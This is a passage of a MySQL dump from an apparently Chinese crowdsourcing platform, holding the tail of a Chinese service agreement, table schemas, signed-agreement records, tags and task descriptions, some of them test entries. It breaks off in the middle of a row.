乙方应当保证服务成果符合国家法律法规的规定,不存在任何侵犯第三方的所有权、知识产权、名誉权、肖像权等侵权行为,并承担因此产生的全部责任。\r\n\r\n\r\n\r\n5.3 甲方的服务需求如需采购第三方知识产权产品的,乙方应当及时告知甲方经甲方书面同意且支付采购费用后,乙方予以采购并使用或由甲方自行采购并提供给乙方使用。\r\n\r\n\r\n\r\n5.4 甲方在未付清所有服务费用之前,不得使用服务成果,不得主张服务成果的知识产权。如甲方在未付清服务费用之前自行或许可他人使用(包含但不限于直接使用、修改后使用)乙方提交的服务成果的,导致乙方或者其他第三方遭受损失的,甲方应承担由此产生的全部责任。\r\n\r\n\r\n\r\n5.5 甲方应积极就服务成果申请相关知识产权(如有),如发生第三方侵权的,乙方可协助甲方维权,但不对维权结果承担任何责任。\r\n\r\n\r\n\r\n6. 责任限制\r\n\r\n乙方依照法律规定履行基础保障义务,但对于下述原因导致的合同履行障碍、履行瑕疵、履行延后或履行内容变更等情形,乙方并不承担相应的违约责任:\r\n\r\n\r\n\r\n6、因自然灾害、罢工、暴乱、战争、政府行为、司法行政命令等不可抗力因素;\r\n\r\n\r\n\r\n6、因电力供应故障、通讯网络故障等公共服务因素或第三人因素;\r\n\r\n\r\n\r\n6、在乙方已尽善意管理的情况下,因常规或紧急的设备与系统维护、设备与系统故障、网络信息与数据安全等因素。\r\n\r\n\r\n\r\n7. 违约责任\r\n\r\n7.1 乙方未按照合同的约定按时提交服务成果的,应向甲方支付合同中规定的违约金。\r\n\r\n\r\n\r\n7.2 甲方在服务期间无正当理由单方终止协议的,已支付费用无权要求返还。\r\n\r\n\r\n\r\n7.3 乙方在服务期间无正当理由单方终止协议的,所收取的费用应当全部退回给甲方。\r\n\r\n\r\n\r\n7.4 甲乙双方应遵守平台规则以及维护平台商业形象以及维护平台方正常运营,若因甲乙双方任何一方的原因给平台方造成损失的,平台方有权追究其责任,要求其支付违约金,并有权冻结其享有的平台账号;若平台方以法律手段维护其权益的,平台方所支付的全部费用,包括但不限于律师费、诉讼费等,全部由违约方承担。\r\n\r\n\r\n\r\n8. 争议解决\r\n\r\n8.1 因本协议及与本协议有关的争议、解释等,均适用中华人民共和国法律。\r\n\r\n\r\n\r\n8.2 本协议签订或履行过程中,如有争议,双方应当友好协商解决;协商不成,双方一致同意提交平台方所在地人民法院解决。\r\n\r\n\r\n\r\n9. 其他\r\n\r\n9.1 本协议以电子文本形式生成,甲方与乙方完成协议订立手续后,即具有与手写签名同等的法律效力。\r\n\r\n\r\n\r\n9.2 本协议中的任何约定如违反法律法规的规定而无效的,该无效条款不影响本协议其他条款的效力,甲方与乙方仍因履行其他条款所约定的权利义务。\r\n\r\n\r\n\r\n9.3 本协议内容中以加粗方式显著标识的条款,请着重阅读。甲乙方点击“确认”按钮即视为完全接受本协议,在点击之前请再次确认已知悉并完全理解本协议的全部内容','2019-11-07 14:15:11','2019-11-07 14:15:11');
|
||
/*!40000 ALTER TABLE `sign_agreement_settings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `sign_agreements`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `sign_agreements`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `sign_agreements` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`task_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`is_sign` tinyint(1) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_sign_agreements_on_task_id_and_user_id` (`task_id`,`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=101 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `sign_agreements`
|
||
--
|
||
|
||
LOCK TABLES `sign_agreements` WRITE;
|
||
/*!40000 ALTER TABLE `sign_agreements` DISABLE KEYS */;
|
||
INSERT INTO `sign_agreements` VALUES (1,50,50,1,'2019-11-07 14:15:30','2019-11-07 14:15:30'),(2,60,65,1,'2019-11-07 16:45:57','2019-11-07 16:45:57'),(3,60,64,1,'2019-11-07 16:45:59','2019-11-07 16:45:59'),(4,60,63,1,'2019-11-07 16:47:12','2019-11-07 16:47:12'),(5,61,66,1,'2019-11-10 13:36:38','2019-11-10 13:36:38'),(6,64,66,1,'2019-11-10 13:37:05','2019-11-10 13:37:05'),(7,62,66,1,'2019-11-10 13:37:28','2019-11-10 13:37:28'),(8,61,64,1,'2019-11-10 13:39:30','2019-11-10 13:39:30'),(9,62,64,1,'2019-11-10 13:39:57','2019-11-10 13:39:57'),(10,64,64,1,'2019-11-10 13:40:15','2019-11-10 13:40:15'),(11,61,65,1,'2019-11-10 13:41:32','2019-11-10 13:41:32'),(12,64,65,1,'2019-11-10 13:41:53','2019-11-10 13:41:53'),(13,62,65,1,'2019-11-10 13:42:10','2019-11-10 13:42:10'),(14,61,63,1,'2019-11-10 13:44:20','2019-11-10 13:44:20'),(15,64,63,1,'2019-11-10 13:45:29','2019-11-10 13:45:29'),(16,62,63,1,'2019-11-10 13:46:02','2019-11-10 13:46:02'),(17,66,46,1,'2019-11-11 10:03:21','2019-11-11 10:03:21'),(18,66,66,1,'2019-11-11 10:09:38','2019-11-11 10:09:38'),(19,67,64,1,'2019-11-11 17:22:27','2019-11-11 17:22:27'),(20,68,50,1,'2019-11-12 11:33:21','2019-11-12 11:33:21'),(22,69,46,1,'2019-11-13 08:45:07','2019-11-13 08:45:07'),(23,69,65,1,'2019-11-13 08:51:03','2019-11-13 08:51:03'),(24,85,63,1,'2019-11-20 20:21:37','2019-11-20 20:21:37'),(27,81,63,1,'2019-11-21 08:12:37','2019-11-21 08:12:37'),(28,81,50,1,'2019-11-21 08:13:21','2019-11-21 08:13:21'),(29,78,63,1,'2019-11-21 10:46:01','2019-11-21 10:46:01'),(30,75,63,1,'2019-11-21 11:10:40','2019-11-21 11:10:40'),(31,74,63,1,'2019-11-21 12:23:57','2019-11-21 12:23:57'),(32,74,50,1,'2019-11-21 12:24:29','2019-11-21 12:24:29'),(33,76,63,1,'2019-11-21 15:02:58','2019-11-21 15:02:58'),(34,76,50,1,'2019-11-21 15:03:13','2019-11-21 15:03:13'),(35,94,64,1,'2019-12-30 10:05:57','2019-12-30 10:05:57'),(36,92,64,1,'2019-12-30 10:08:52','2019-12-30 10:08:52'),(37,92,66,1,'2019-12-30 14:53:02','2019-12-30 14:53:02'),(38,92,46,1,'2019-12-30 15:08:13','2019-12-30 15:08:13'),(39,93,50,1,'2019-12-30 15:30:57','2019-12-30 15:30:57'),(40,93,46,1,'2019-12-30 15:36:00','2019-12-30 15:36:00'),(41,93,64,1,'2019-12-30 15:38:26','2019-12-30 15:38:26'),(42,94,75,1,'2020-02-02 12:04:14','2020-02-02 12:04:14'),(43,100,73,1,'2020-03-23 10:20:15','2020-03-23 10:20:15'),(44,100,63,1,'2020-03-23 10:22:31','2020-03-23 10:22:31'),(45,100,66,1,'2020-03-23 10:23:48','2020-03-23 10:23:48'),(46,103,46,1,'2020-03-23 14:51:07','2020-03-23 14:51:07'),(47,103,63,1,'2020-03-23 14:54:23','2020-03-23 14:54:23'),(48,103,65,1,'2020-03-23 15:03:23','2020-03-23 15:03:23'),(49,95,46,1,'2020-03-23 15:10:18','2020-03-23 15:10:18'),(50,95,65,1,'2020-03-23 15:11:10','2020-03-23 15:11:10'),(51,105,1,1,'2020-03-24 08:23:23','2020-03-24 08:23:23'),(52,105,73,1,'2020-03-24 08:24:10','2020-03-24 08:24:10'),(53,106,73,1,'2020-03-24 08:48:56','2020-03-24 08:48:56'),(54,107,73,1,'2020-03-24 08:50:07','2020-03-24 08:50:07'),(55,108,73,1,'2020-03-24 08:50:55','2020-03-24 08:50:55'),(56,96,46,1,'2020-03-24 08:55:10','2020-03-24 08:55:10'),(57,96,63,1,'2020-03-24 08:55:54','2020-03-24 08:55:54'),(58,95,63,1,'2020-03-24 08:56:57','2020-03-24 08:56:57'),(59,108,63,1,'2020-03-24 08:57:31','2020-03-24 08:57:31'),(60,99,63,1,'2020-03-24 08:58:16','2020-03-24 08:58:16'),(61,99,46,1,'2020-03-24 08:59:44','2020-03-24 08:59:44'),(62,99,66,1,'2020-03-24 09:00:38','2020-03-24 09:00:38'),(63,27,66,1,'2020-03-24 09:02:12','2020-03-24 09:02:12'),(64,27,46,1,'2020-03-24 09:02:53','2020-03-24 09:02:53'),(65,27,63,1,'2020-03-24 09:03:14','2020-03-24 09:03:14'),(66,98,63,1,'2020-03-24 09:04:05','2020-03-24 09:04:05'),(67,98,66,1,'2020-03-24 09:04:37','2020-03-24 09:04:37'),(68,98,46,1,'2020-03-24 09:05:12','2020-03-24 09:05:12'),(69,95,66,1,'2020-03-24 09:09:24','2020-03-24 09:09:24'),(70,104,1,1,'2020-03-24 17:14:16','2020-03-24 17:14:16'),(71,110,1,1,'2020-03-25 15:52:34','2020-03-25 15:52:34'),(72,97,46,1,'2020-03-27 15:32:28','2020-03-27 15:32:28'),(73,89,1,1,'2020-03-27 15:33:45','2020-03-27 15:33:45'),(74,89,66,1,'2020-03-27 15:35:19','2020-03-27 15:35:19'),(75,97,1,1,'2020-03-27 15:35:54','2020-03-27 15:35:54'),(76,97,66,1,'2020-03-27 15:37:57','2020-03-27 15:37:57'),(77,113,1,1,'2020-04-02 15:45:14','2020-04-02 15:45:14'),(78,114,46,1,'2020-04-09 09:09:54','2020-04-09 09:09:54'),(79,114,66,1,'2020-04-09 09:17:13','2020-04-09 09:17:13'),(80,111,55,1,'2020-04-26 15:31:20','2020-04-26 15:31:20'),(81,116,46,1,'2020-10-15 10:23:56','2020-10-15 10:23:56'),(82,116,66,1,'2020-10-15 10:28:18','2020-10-15 10:28:18'),(83,116,63,1,'2020-10-15 10:39:42','2020-10-15 10:39:42'),(84,115,46,1,'2020-10-15 10:58:42','2020-10-15 10:58:42'),(85,115,63,1,'2020-10-15 11:00:49','2020-10-15 11:00:49'),(86,117,46,1,'2020-10-16 08:03:34','2020-10-16 08:03:34'),(87,117,63,1,'2020-10-16 08:04:44','2020-10-16 08:04:44'),(88,118,46,1,'2020-10-16 08:49:16','2020-10-16 08:49:16'),(89,118,63,1,'2020-10-16 08:49:53','2020-10-16 08:49:53'),(90,119,46,1,'2020-10-16 12:25:53','2020-10-16 12:25:53'),(91,119,66,1,'2020-10-16 12:31:13','2020-10-16 12:31:13'),(92,120,46,1,'2020-12-01 11:14:34','2020-12-01 11:14:34'),(93,109,119,1,'2020-12-24 12:22:56','2020-12-24 12:22:56'),(94,111,119,1,'2020-12-24 12:24:06','2020-12-24 12:24:06'),(95,112,119,1,'2020-12-24 12:26:02','2020-12-24 12:26:02'),(96,2,119,1,'2021-01-22 12:13:03','2021-01-22 12:13:03'),(97,121,73,1,'2021-02-23 14:45:14','2021-02-23 14:45:14'),(98,121,1,1,'2021-02-23 14:45:56','2021-02-23 14:45:56'),(99,122,73,1,'2021-02-23 16:35:56','2021-02-23 16:35:56'),(100,109,1,1,'2021-03-05 08:51:45','2021-03-05 08:51:45');
|
||
/*!40000 ALTER TABLE `sign_agreements` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `softapplications`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `softapplications`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `softapplications` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`app_type_id` int(11) DEFAULT NULL,
|
||
`app_type_name` varchar(255) DEFAULT NULL,
|
||
`android_min_version_available` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`contest_id` int(11) DEFAULT NULL,
|
||
`softapplication_id` int(11) DEFAULT NULL,
|
||
`is_public` int(11) DEFAULT NULL,
|
||
`application_developers` varchar(255) DEFAULT NULL,
|
||
`deposit_project_url` varchar(255) DEFAULT NULL,
|
||
`deposit_project` varchar(255) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `softapplications`
|
||
--
|
||
|
||
LOCK TABLES `softapplications` WRITE;
|
||
/*!40000 ALTER TABLE `softapplications` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `softapplications` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `sonar_errors`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `sonar_errors`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `sonar_errors` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`jenkins_job_name` varchar(255) DEFAULT NULL,
|
||
`output` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `sonar_errors`
|
||
--
|
||
|
||
LOCK TABLES `sonar_errors` WRITE;
|
||
/*!40000 ALTER TABLE `sonar_errors` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `sonar_errors` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `ssos`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `ssos`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `ssos` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`openid` varchar(255) DEFAULT NULL,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`password` varchar(255) DEFAULT NULL,
|
||
`email` varchar(255) DEFAULT NULL,
|
||
`sex` int(11) DEFAULT NULL,
|
||
`school` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_ssos_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `ssos`
|
||
--
|
||
|
||
LOCK TABLES `ssos` WRITE;
|
||
/*!40000 ALTER TABLE `ssos` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `ssos` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `system_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `system_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `system_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`content` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`description` text,
|
||
`subject` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `system_messages`
|
||
--
|
||
|
||
LOCK TABLES `system_messages` WRITE;
|
||
/*!40000 ALTER TABLE `system_messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `system_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `taggings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `taggings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `taggings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`tag_id` int(11) DEFAULT NULL,
|
||
`taggable_id` int(11) DEFAULT NULL,
|
||
`taggable_type` varchar(255) DEFAULT NULL,
|
||
`tagger_id` int(11) DEFAULT NULL,
|
||
`tagger_type` varchar(255) DEFAULT NULL,
|
||
`context` varchar(128) DEFAULT NULL,
|
||
`created_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_taggings_on_tag_id` (`tag_id`),
|
||
KEY `index_taggings_on_taggable_id_and_taggable_type_and_context` (`taggable_id`,`taggable_type`,`context`),
|
||
KEY `index_taggings_on_taggable_type` (`taggable_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=76 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `taggings`
|
||
--
|
||
|
||
LOCK TABLES `taggings` WRITE;
|
||
/*!40000 ALTER TABLE `taggings` DISABLE KEYS */;
|
||
INSERT INTO `taggings` VALUES (1,1,445,'Attachment',NULL,NULL,'tags','2019-01-15 15:09:06'),(6,1,466,'Attachment',NULL,NULL,'tags','2019-04-17 23:28:18'),(17,1,765,'Attachment',NULL,NULL,'tags','2019-10-08 11:06:46'),(18,6,765,'Attachment',NULL,NULL,'tags','2019-10-08 11:07:00'),(19,2,766,'Attachment',NULL,NULL,'tags','2019-10-08 13:48:55'),(21,7,769,'Attachment',NULL,NULL,'tags','2019-10-23 15:36:35'),(28,1,916,'Attachment',NULL,NULL,'tags','2019-11-07 16:27:26'),(30,1,952,'Attachment',NULL,NULL,'tags','2019-11-11 15:18:54'),(31,2,956,'Attachment',NULL,NULL,'tags','2019-11-11 17:16:42'),(32,1,956,'Attachment',NULL,NULL,'tags','2019-11-11 17:16:42'),(34,2,994,'Attachment',NULL,NULL,'tags','2020-02-01 19:31:40'),(35,3,994,'Attachment',NULL,NULL,'tags','2020-02-01 19:31:40'),(36,2,995,'Attachment',NULL,NULL,'tags','2020-02-03 18:06:36'),(37,1,995,'Attachment',NULL,NULL,'tags','2020-02-03 18:06:36'),(38,1,1024,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(39,1,1025,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(40,1,1026,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(41,1,1027,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(42,1,1028,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(43,1,1029,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(44,1,1030,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(45,1,1031,'Attachment',NULL,NULL,'tags','2020-02-11 10:31:01'),(46,1,1032,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(47,1,1033,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(48,1,1034,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(49,1,1035,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(50,1,1036,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(51,1,1037,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(52,1,1038,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(53,8,1032,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(54,8,1033,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(55,8,1034,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(56,8,1035,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(57,8,1036,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(58,8,1037,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(59,8,1038,'Attachment',NULL,NULL,'tags','2020-02-11 10:33:41'),(60,1,1039,'Attachment',NULL,NULL,'tags','2020-02-11 19:19:25'),(61,1,1040,'Attachment',NULL,NULL,'tags','2020-02-11 21:51:34'),(62,1,1041,'Attachment',NULL,NULL,'tags','2020-02-11 21:51:34'),(63,1,1046,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(64,1,1047,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(65,1,1048,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(68,1,1051,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(69,1,1052,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(72,1,1055,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52'),(75,1,1058,'Attachment',NULL,NULL,'tags','2020-03-19 14:08:52');
|
||
/*!40000 ALTER TABLE `taggings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `tags`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `tags`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `tags` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `tags`
|
||
--
|
||
|
||
LOCK TABLES `tags` WRITE;
|
||
/*!40000 ALTER TABLE `tags` DISABLE KEYS */;
|
||
INSERT INTO `tags` VALUES (1,'文档'),(2,'软件版本'),(3,'代码'),(4,'无人机'),(5,'icon'),(6,'说明'),(7,'其它'),(8,'论文');
|
||
/*!40000 ALTER TABLE `tags` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `task_details`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `task_details`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `task_details` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`description` text NOT NULL,
|
||
`task_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=123 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `task_details`
|
||
--
|
||
|
||
LOCK TABLES `task_details` WRITE;
|
||
/*!40000 ALTER TABLE `task_details` DISABLE KEYS */;
|
||
INSERT INTO `task_details` VALUES (1,'<p>软件主要完成基于开源项目的软件需求采集及分析,并将需求分析结果以XML或UML格式输出。</p>\r\n',1,'2019-08-06 08:42:00','2019-08-06 08:42:00'),(2,'<p>开发一个基于5G网络的远程手术系统,不仅可以实现远程手术操作,并可以实时记录操作流程,供别人参考学习。</p>\r\n',2,'2019-08-06 16:20:00','2019-08-06 16:20:00'),(3,'<p>通过5G高速网络实现远程手术操作,并能够实时记录手术过程,以便供人参考学习手术。</p>\r\n',3,'2019-08-06 16:26:14','2019-08-06 16:26:14'),(4,'<p>涵盖C语言的所有内容,赋值、选择、循环及函数调用,每一个章节都有课后练习题及答案,供学生学习与练习。最后还要有综合性测试,检验整书的学习情况。</p>\r\n',4,'2019-08-06 16:30:38','2019-08-06 16:30:38'),(5,'<p>需要突出仿真平台特色,面向机器人仿真,设计的UI界面应该友好易用,学习使用成本低,并且兼顾美观等因素</p>\r\n',5,'2019-08-07 16:18:38','2019-08-07 16:18:38'),(6,'<p>征集飞行器驾驶相关的理论研究论文</p>\r\n',6,'2019-08-07 16:44:21','2019-08-07 16:44:21'),(7,'夏季越来越热,若预防不当,可能会出现中暑。现寻找一些避暑方法,以及身边出现中暑的人的救治方法',7,'2019-08-09 15:25:30','2019-08-09 15:25:30'),(8,'公众号的开发,可以在附件查看详情',8,'2019-08-13 08:55:19','2019-08-13 08:55:19'),(9,'该算法需要为大规模机器人实时仿真提供支撑。具体要求为:通过设计实现高效的碰撞检测算法,解决机器人仿真规模超过1000时,传统算法会产生大量碰撞计算问题。算法的输入是所有实体的位置坐标,输出是经过碰撞检测之后得到的可能发生碰撞的实体列表。\r\n提交的成果形式:算法和设计文档。',9,'2019-08-13 12:16:09','2019-08-13 12:16:09'),(10,'工具在Linux系统上运行;支持对源程序、构件、动态库、服务、二进制等5种代码形式生成可视化网络;支持动态网络3D展示;支持实时过滤网络;支持5000节点和100万条边;支持500个节点信息展示;提供节点信息导入接口,遵循GDF接口标准;使用Python编程,可基于现有开源工具改造,相应开源协议需支持衍生物产权转移。\r\n交付形式:软件依赖网络可视化工具一套,附带源代码和相关开发文档。',10,'2019-08-13 12:25:41','2019-08-13 12:25:41'),(11,'充分利用5G网络的高速性能,实现对道路交通事故的实时监测与应急处理。',11,'2019-08-13 12:40:23','2019-08-13 12:40:23'),(12,'讨论网络文学作品的版权认证及保护。',12,'2019-08-13 14:46:17','2019-08-13 14:46:17'),(13,'在线课堂的设计及制作',13,'2019-08-13 15:13:44','2019-08-13 15:13:44'),(14,'塑料袋是我们日常生活中经常使用的物品,但是废弃塑料袋如何才能更好的处理,才能不污染环境?',14,'2019-08-22 10:26:27','2019-08-22 10:26:27'),(15,'ppt',15,'2019-08-23 12:56:31','2019-08-23 12:56:31'),(16,'对于小说活着有比较深刻的理解',16,'2019-08-23 15:13:50','2019-08-23 15:13:50'),(17,'公司 的规章管理制度制作',17,'2019-08-26 09:52:56','2019-08-26 09:52:56'),(18,'短片书评',18,'2019-08-26 09:55:52','2019-08-26 09:55:52'),(19,'如题',19,'2019-08-26 10:27:11','2019-08-26 10:27:11'),(20,'如何短时间运好球',20,'2019-08-26 10:41:21','2019-08-26 10:41:21'),(21,'如何锻炼',21,'2019-08-26 10:44:39','2019-08-26 10:44:39'),(22,'如何瘦腿',22,'2019-08-26 10:45:31','2019-08-26 10:45:31'),(23,'测试的需求测试的需求测试的需求测试的需求测试的需求测试的需求',23,'2019-09-06 08:50:51','2019-09-06 08:50:51'),(24,'完成可控开源社区的UI设计',24,'2019-09-16 10:18:23','2019-09-16 10:18:23'),(25,'软件工程流程并没有完全统一的要求,但是在实际的工程实施过程中,不同的项目组会根据当前的软件任务进行适当的裁剪或调整,但其总体要求仍然不能脱离软件工程的基本要求,为用户提供满足其需求、可用、好用的软件,仍然是软件工程的目标。',25,'2019-10-25 08:53:23','2019-10-25 08:53:23'),(26,'测试创客空间对需求发布的功能。',26,'2019-10-25 08:58:33','2019-10-25 08:58:33'),(27,'计算机项目填写\r\n世世代代都只会烧瓷一事的小镇匠人,既不敢僭越烧制贡品官窑,',27,'2019-10-25 09:13:16','2020-03-23 09:11:24'),(28,'创客空间测试03',28,'2019-10-25 09:16:14','2019-10-25 09:16:14'),(29,'开展经常性体育活动,有利于人民身体健康',29,'2019-10-25 09:31:42','2019-10-25 09:31:42'),(30,'需要突出仿真平台的特色,即面向机器人仿真,设计的UI界面应该是用户友好的,学习使用成本低,且兼顾美观等因素。\r\n交付物:创意的系统阐述文档',30,'2019-10-27 14:08:54','2019-10-27 14:08:54'),(31,'该算法需要为大规模机器人实时仿真提供支撑。具体地,通过设计实现高效的碰撞检测算法,解决机器人仿真规模超过1000时,传统算法会产生大量碰撞计算的问题。算法的输入是所有实体的位置坐标,输出是经过碰撞检测之后得到的可能发生碰撞的实体列表。\r\n成果形式:算法和设计文档\r\n',31,'2019-10-27 14:41:43','2019-10-27 14:41:43'),(32,'工具在Linux系统上运行;支持对源程序、构件、动态库、服务、二进制等5种代码形式生成可视化网络;支持动态网络3D展示;支持实时过滤网络;支持5000节点和100万条边;支持500个节点信息展示;提供节点信息导入接口,遵循GDF接口标准;使用Python编程,可基于现有开源工具改造,相应开源协议需支持衍生物产权转移。\r\n交付物:软件依赖网络可视化工具一套,附带原码和开发文档\r\n',32,'2019-10-27 15:00:19','2019-10-27 15:00:19'),(33,'测试雇主上传凭证材料,包括评选佐证材料、协议签订材料及支付凭证材料。',33,'2019-10-28 10:21:21','2019-10-28 10:21:21'),(34,'11111111111',34,'2019-10-29 08:36:25','2019-10-29 08:36:25'),(35,'水电费',35,'2019-10-29 08:51:00','2019-10-29 08:51:00'),(36,'额发',36,'2019-10-29 09:22:39','2019-10-29 09:22:39'),(37,'手动阀',37,'2019-10-29 09:25:23','2019-10-29 09:25:23'),(38,'等',38,'2019-10-29 09:34:07','2019-10-29 09:34:07'),(39,'是是是',39,'2019-10-29 09:34:43','2019-10-29 09:34:43'),(40,'位却',40,'2019-10-29 09:35:29','2019-10-29 09:35:29'),(41,'的说法',41,'2019-10-29 09:37:40','2019-10-29 09:37:40'),(42,'萨芬的',42,'2019-10-29 09:43:20','2019-10-29 09:43:20'),(43,'阿道夫',43,'2019-10-29 09:46:32','2019-10-29 09:46:32'),(44,'搜索s',44,'2019-10-29 12:50:00','2019-10-29 12:50:00'),(45,'搜索',45,'2019-10-29 13:00:31','2019-10-29 13:00:31'),(46,'11',46,'2019-10-29 15:09:33','2019-10-29 